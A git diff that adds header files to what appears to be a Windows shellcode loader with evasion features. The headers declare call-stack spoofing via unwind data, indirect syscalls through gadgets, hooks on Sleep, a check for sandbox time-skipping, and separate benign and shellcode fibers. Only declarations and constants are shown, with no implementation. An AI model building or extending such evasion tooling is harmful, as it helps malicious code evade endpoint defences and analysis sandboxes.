diff --git a/headers/callstackspoof.h b/headers/callstackspoof.h new file mode 100644 index 0000000..e4aeb95 --- /dev/null +++ b/headers/callstackspoof.h @@ -0,0 +1,15 @@ +#pragma once + +#ifndef CALLSTACKSPOOF_H +#define CALLSTACKSPOOF_H + +// Function to get the Exception Directory from .PDATA +VOID GetExceptionAddress(PEXCEPTION_INFO pExceptionInfo); + +// Backend function that does all the hard work +ULONG CalculateStackSizeBackend(PRUNTIME_FUNCTION pRuntimeFunctionTable, ULONG functionCount, DWORD64 ImageBase, DWORD64 pFuncAddr); + +// Wrapper function for CalculateStackSizeBackend +ULONG CalculateStackSize(PVOID ReturnAddress); + +#endif \ No newline at end of file diff --git a/headers/definitions.h b/headers/definitions.h new file mode 100644 index 0000000..e2b6249 --- /dev/null +++ b/headers/definitions.h @@ -0,0 +1,44 @@ +#pragma once + +#ifndef DEFINITIONS_H +#define DEFINITIONS_H + +#define WIN32_LEAN_AND_MEAN +#define NO_MIN_MAX + +#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1) +#define NtCurrentThread() ((HANDLE)(LONG_PTR)-2) +#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= STATUS_SUCCESS) + +#define NTAPI_FUNCTION EXTERN_C NTSTATUS NTAPI +#define RTL_CONSTANT_STRING(s) { sizeof((s)) - sizeof((s)[0]), sizeof((s)), (PWCH)(s) } + +#define InitializeObjectAttributes(p, n, a, r, s) \ + do { \ + (p)->Length = sizeof(OBJECT_ATTRIBUTES); \ + (p)->RootDirectory = (r); \ + (p)->Attributes = (a); \ + (p)->ObjectName = (n); \ + (p)->SecurityDescriptor = (s); \ + (p)->SecurityQualityOfService = nullptr; \ + } while (0) + +#define RtlInitUnicodeString(DestinationString, SourceString) \ + do { \ + if ((SourceString) == nullptr) { \ + (DestinationString)->Length = 0; \ + (DestinationString)->MaximumLength = 0; \ + (DestinationString)->Buffer = nullptr; \ + } else { \ + size_t size = wcslen(SourceString) * sizeof(WCHAR); \ + (DestinationString)->Length = static_cast(size); \ + (DestinationString)->MaximumLength = static_cast(size + sizeof(WCHAR)); \ + (DestinationString)->Buffer = const_cast(SourceString); \ + } \ + } while (0) + +#define NEW_STREAM L":%x%x\x00" +#define PROCESSOR_FEATURE_MAX 64 +#define KUSER_SHARED_DATA_ADDRESS 0x7FFE0000 + +#endif \ No newline at end of file diff --git a/headers/enums.h b/headers/enums.h new file mode 100644 index 0000000..72a252a --- /dev/null +++ b/headers/enums.h @@ -0,0 +1,121 @@ +#pragma once + +#ifndef ENUMS_H +#define ENUMS_H + +typedef enum _UNWIND_OP_CODES { + UWOP_PUSH_NONVOL = 0, /* info == register number */ + UWOP_ALLOC_LARGE, /* no info, alloc size in next 2 slots */ + UWOP_ALLOC_SMALL, /* info == size of allocation / 8 - 1 */ + UWOP_SET_FPREG, /* no info, FP = RSP + UNWIND_INFO.FPRegOffset*16 */ + UWOP_SAVE_NONVOL, /* info == register number, offset in next slot */ + UWOP_SAVE_NONVOL_FAR, /* info == register number, offset in next 2 slots */ + UWOP_SAVE_XMM128 = 8, /* info == XMM reg number, offset in next slot */ + UWOP_SAVE_XMM128_FAR, /* info == XMM reg number, offset in next 2 slots */ + UWOP_PUSH_MACHFRAME /* info == 0: no error-code, 1: error-code */ +} UNWIND_CODE_OPS; + +typedef enum _FILE_INFO_CLASS +{ + //FileDirectoryInformation, // q: FILE_DIRECTORY_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) + FileFullDirectoryInformation = 2, // q: FILE_FULL_DIR_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) + FileBothDirectoryInformation, // q: FILE_BOTH_DIR_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) + FileBasicInformation, // q; s: FILE_BASIC_INFORMATION (q: requires FILE_READ_ATTRIBUTES; s: requires FILE_WRITE_ATTRIBUTES) + FileStandardInformation, // q: FILE_STANDARD_INFORMATION, FILE_STANDARD_INFORMATION_EX + FileInternalInformation, // q: FILE_INTERNAL_INFORMATION + FileEaInformation, // q: FILE_EA_INFORMATION + FileAccessInformation, // q: FILE_ACCESS_INFORMATION + FileNameInformation, // q: FILE_NAME_INFORMATION + FileRenameInformation, // s: FILE_RENAME_INFORMATION (requires DELETE) // 10 + FileLinkInformation, // s: FILE_LINK_INFORMATION + FileNamesInformation, // q: FILE_NAMES_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) + FileDispositionInformation, // s: FILE_DISPOSITION_INFORMATION (requires DELETE) + FilePositionInformation, // q; s: FILE_POSITION_INFORMATION + FileFullEaInformation, // FILE_FULL_EA_INFORMATION + FileModeInformation, // q; s: FILE_MODE_INFORMATION + FileAlignmentInformation, // q: FILE_ALIGNMENT_INFORMATION + FileAllInformation, // q: FILE_ALL_INFORMATION (requires FILE_READ_ATTRIBUTES) + FileAllocationInformation, // s: FILE_ALLOCATION_INFORMATION (requires FILE_WRITE_DATA) + FileEndOfFileInformation, // s: FILE_END_OF_FILE_INFORMATION (requires FILE_WRITE_DATA) // 20 + FileAlternateNameInformation, // q: FILE_NAME_INFORMATION + FileStreamInformation, // q: FILE_STREAM_INFORMATION + FilePipeInformation, // q; s: FILE_PIPE_INFORMATION (q: requires FILE_READ_ATTRIBUTES; s: requires FILE_WRITE_ATTRIBUTES) + FilePipeLocalInformation, // q: FILE_PIPE_LOCAL_INFORMATION (requires FILE_READ_ATTRIBUTES) + FilePipeRemoteInformation, // q; s: FILE_PIPE_REMOTE_INFORMATION (q: requires FILE_READ_ATTRIBUTES; s: requires FILE_WRITE_ATTRIBUTES) + FileMailslotQueryInformation, // q: FILE_MAILSLOT_QUERY_INFORMATION + FileMailslotSetInformation, // s: FILE_MAILSLOT_SET_INFORMATION + FileCompressionInformation, // q: FILE_COMPRESSION_INFORMATION + FileObjectIdInformation, // q: FILE_OBJECTID_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) + FileCompletionInformation, // s: FILE_COMPLETION_INFORMATION // 30 + FileMoveClusterInformation, // s: FILE_MOVE_CLUSTER_INFORMATION (requires FILE_WRITE_DATA) + FileQuotaInformation, // q: FILE_QUOTA_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) + FileReparsePointInformation, // q: FILE_REPARSE_POINT_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) + FileNetworkOpenInformation, // q: FILE_NETWORK_OPEN_INFORMATION (requires FILE_READ_ATTRIBUTES) + FileAttributeTagInformation, // q: FILE_ATTRIBUTE_TAG_INFORMATION (requires FILE_READ_ATTRIBUTES) + FileTrackingInformation, // s: FILE_TRACKING_INFORMATION (requires FILE_WRITE_DATA) + FileIdBothDirectoryInformation, // q: FILE_ID_BOTH_DIR_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) + FileIdFullDirectoryInformation, // q: FILE_ID_FULL_DIR_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) + FileValidDataLengthInformation, // s: FILE_VALID_DATA_LENGTH_INFORMATION (requires FILE_WRITE_DATA and/or SeManageVolumePrivilege) + FileShortNameInformation, // s: FILE_NAME_INFORMATION (requires DELETE) // 40 + FileIoCompletionNotificationInformation, // q; s: FILE_IO_COMPLETION_NOTIFICATION_INFORMATION (q: requires FILE_READ_ATTRIBUTES) // since VISTA + FileIoStatusBlockRangeInformation, // s: FILE_IOSTATUSBLOCK_RANGE_INFORMATION (requires SeLockMemoryPrivilege) + FileIoPriorityHintInformation, // q; s: FILE_IO_PRIORITY_HINT_INFORMATION, FILE_IO_PRIORITY_HINT_INFORMATION_EX (q: requires FILE_READ_DATA) + FileSfioReserveInformation, // q; s: FILE_SFIO_RESERVE_INFORMATION (q: requires FILE_READ_DATA) + FileSfioVolumeInformation, // q: FILE_SFIO_VOLUME_INFORMATION (requires FILE_READ_ATTRIBUTES) + FileHardLinkInformation, // q: FILE_LINKS_INFORMATION + FileProcessIdsUsingFileInformation, // q: FILE_PROCESS_IDS_USING_FILE_INFORMATION (requires FILE_READ_ATTRIBUTES) + FileNormalizedNameInformation, // q: FILE_NAME_INFORMATION + FileNetworkPhysicalNameInformation, // q: FILE_NETWORK_PHYSICAL_NAME_INFORMATION + FileIdGlobalTxDirectoryInformation, // q: FILE_ID_GLOBAL_TX_DIR_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) // since WIN7 // 50 + FileIsRemoteDeviceInformation, // q: FILE_IS_REMOTE_DEVICE_INFORMATION (requires FILE_READ_ATTRIBUTES) + FileUnusedInformation, + FileNumaNodeInformation, // q: FILE_NUMA_NODE_INFORMATION + FileStandardLinkInformation, // q: FILE_STANDARD_LINK_INFORMATION + FileRemoteProtocolInformation, // q: FILE_REMOTE_PROTOCOL_INFORMATION + FileRenameInformationBypassAccessCheck, // (kernel-mode only); s: FILE_RENAME_INFORMATION // since WIN8 + FileLinkInformationBypassAccessCheck, // (kernel-mode only); s: FILE_LINK_INFORMATION + FileVolumeNameInformation, // q: FILE_VOLUME_NAME_INFORMATION + FileIdInformation, // q: FILE_ID_INFORMATION + FileIdExtdDirectoryInformation, // q: FILE_ID_EXTD_DIR_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) // 60 + FileReplaceCompletionInformation, // s: FILE_COMPLETION_INFORMATION // since WINBLUE + FileHardLinkFullIdInformation, // q: FILE_LINK_ENTRY_FULL_ID_INFORMATION // FILE_LINKS_FULL_ID_INFORMATION + FileIdExtdBothDirectoryInformation, // q: FILE_ID_EXTD_BOTH_DIR_INFORMATION (requires FILE_LIST_DIRECTORY) (NtQueryDirectoryFile[Ex]) // since THRESHOLD + FileDispositionInformationEx, // s: FILE_DISPOSITION_INFO_EX (requires DELETE) // since REDSTONE + FileRenameInformationEx, // s: FILE_RENAME_INFORMATION_EX + FileRenameInformationExBypassAccessCheck, // (kernel-mode only); s: FILE_RENAME_INFORMATION_EX + FileDesiredStorageClassInformation, // q; s: FILE_DESIRED_STORAGE_CLASS_INFORMATION (q: requires FILE_READ_ATTRIBUTES; s: requires FILE_WRITE_ATTRIBUTES) // since REDSTONE2 + FileStatInformation, // q: FILE_STAT_INFORMATION (requires FILE_READ_ATTRIBUTES) + FileMemoryPartitionInformation, // s: FILE_MEMORY_PARTITION_INFORMATION // since REDSTONE3 + FileStatLxInformation, // q: FILE_STAT_LX_INFORMATION (requires FILE_READ_ATTRIBUTES and FILE_READ_EA) // since REDSTONE4 // 70 + FileCaseSensitiveInformation, // q; s: FILE_CASE_SENSITIVE_INFORMATION (q: requires FILE_READ_ATTRIBUTES; s: requires FILE_WRITE_ATTRIBUTES) + FileLinkInformationEx, // s: FILE_LINK_INFORMATION_EX // since REDSTONE5 + FileLinkInformationExBypassAccessCheck, // (kernel-mode only); s: FILE_LINK_INFORMATION_EX + FileStorageReserveIdInformation, // q; s: FILE_STORAGE_RESERVE_ID_INFORMATION (q: requires FILE_READ_ATTRIBUTES; s: requires FILE_WRITE_ATTRIBUTES) + FileCaseSensitiveInformationForceAccessCheck, // q; s: FILE_CASE_SENSITIVE_INFORMATION + FileKnownFolderInformation, // q; s: FILE_KNOWN_FOLDER_INFORMATION (q: requires FILE_READ_ATTRIBUTES; s: requires FILE_WRITE_ATTRIBUTES) // since WIN11 + FileStatBasicInformation, // since 23H2 + FileId64ExtdDirectoryInformation, // FILE_ID_64_EXTD_DIR_INFORMATION + FileId64ExtdBothDirectoryInformation, // FILE_ID_64_EXTD_BOTH_DIR_INFORMATION + FileIdAllExtdDirectoryInformation, // FILE_ID_ALL_EXTD_DIR_INFORMATION + FileIdAllExtdBothDirectoryInformation, // FILE_ID_ALL_EXTD_BOTH_DIR_INFORMATION + FileStreamReservationInformation, // FILE_STREAM_RESERVATION_INFORMATION // since 24H2 + FileMupProviderInfo, // MUP_PROVIDER_INFORMATION + FileMaximumInformation +} FILE_INFO_CLASS, * PFILE_INFO_CLASS; + + +typedef enum _NT_PRODUCT_TYPE { + NtProductWinNt = 1, + NtProductLanManNt, + NtProductServer +} NT_PRODUCT_TYPE, +* PNT_PRODUCT_TYPE; + +typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE { + StandardDesign, + NEC98x86, + EndAlternatives +} ALTERNATIVE_ARCHITECTURE_TYPE; + + +#endif \ No newline at end of file diff --git a/headers/includes.h b/headers/includes.h new file mode 100644 index 0000000..08df9f8 --- /dev/null +++ b/headers/includes.h @@ -0,0 +1,25 @@ +#pragma once + +#ifndef INCLUDES_H +#define INCLUDES_H + +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#endif \ No newline at end of file diff --git a/headers/sleep.h b/headers/sleep.h new file mode 100644 index 0000000..56af9ac --- /dev/null +++ b/headers/sleep.h @@ -0,0 +1,33 @@ +#pragma once + +#ifndef SLEEP_H +#define SLEEP_H + +EXTERN_C DWORD dwSSN; +EXTERN_C PVOID qwJMP; +EXTERN_C PVOID NTAPI Spoof(PVOID a, ...); +EXTERN_C PVOID CallR12(PVOID Function, ULONGLONG nArgs, PVOID r12_gadget, ...); +NTAPI_FUNCTION CallMe(); + +extern PBYTE hNtdll, hKernel32; +extern std::vector callR12gadgets; +extern PVOID gadget; +extern NTSTATUS status; + +// Check if process sleeptime is being fastforwarded +BOOL FiveHourEnergy(); + +// Sleeping without calling Sleep() +VOID ImNotSleepingIPromise(DWORD milliseconds); + +// Hook Sleep and SleepEx +VOID ReSleep(); + +extern SyscallEntry NtCreateEvent; +extern SyscallEntry sysNtWaitForSingleObject; + +extern LPVOID mainFiber; +extern LPVOID benignFiber; +extern LPVOID shellcodeFiber; + +#endif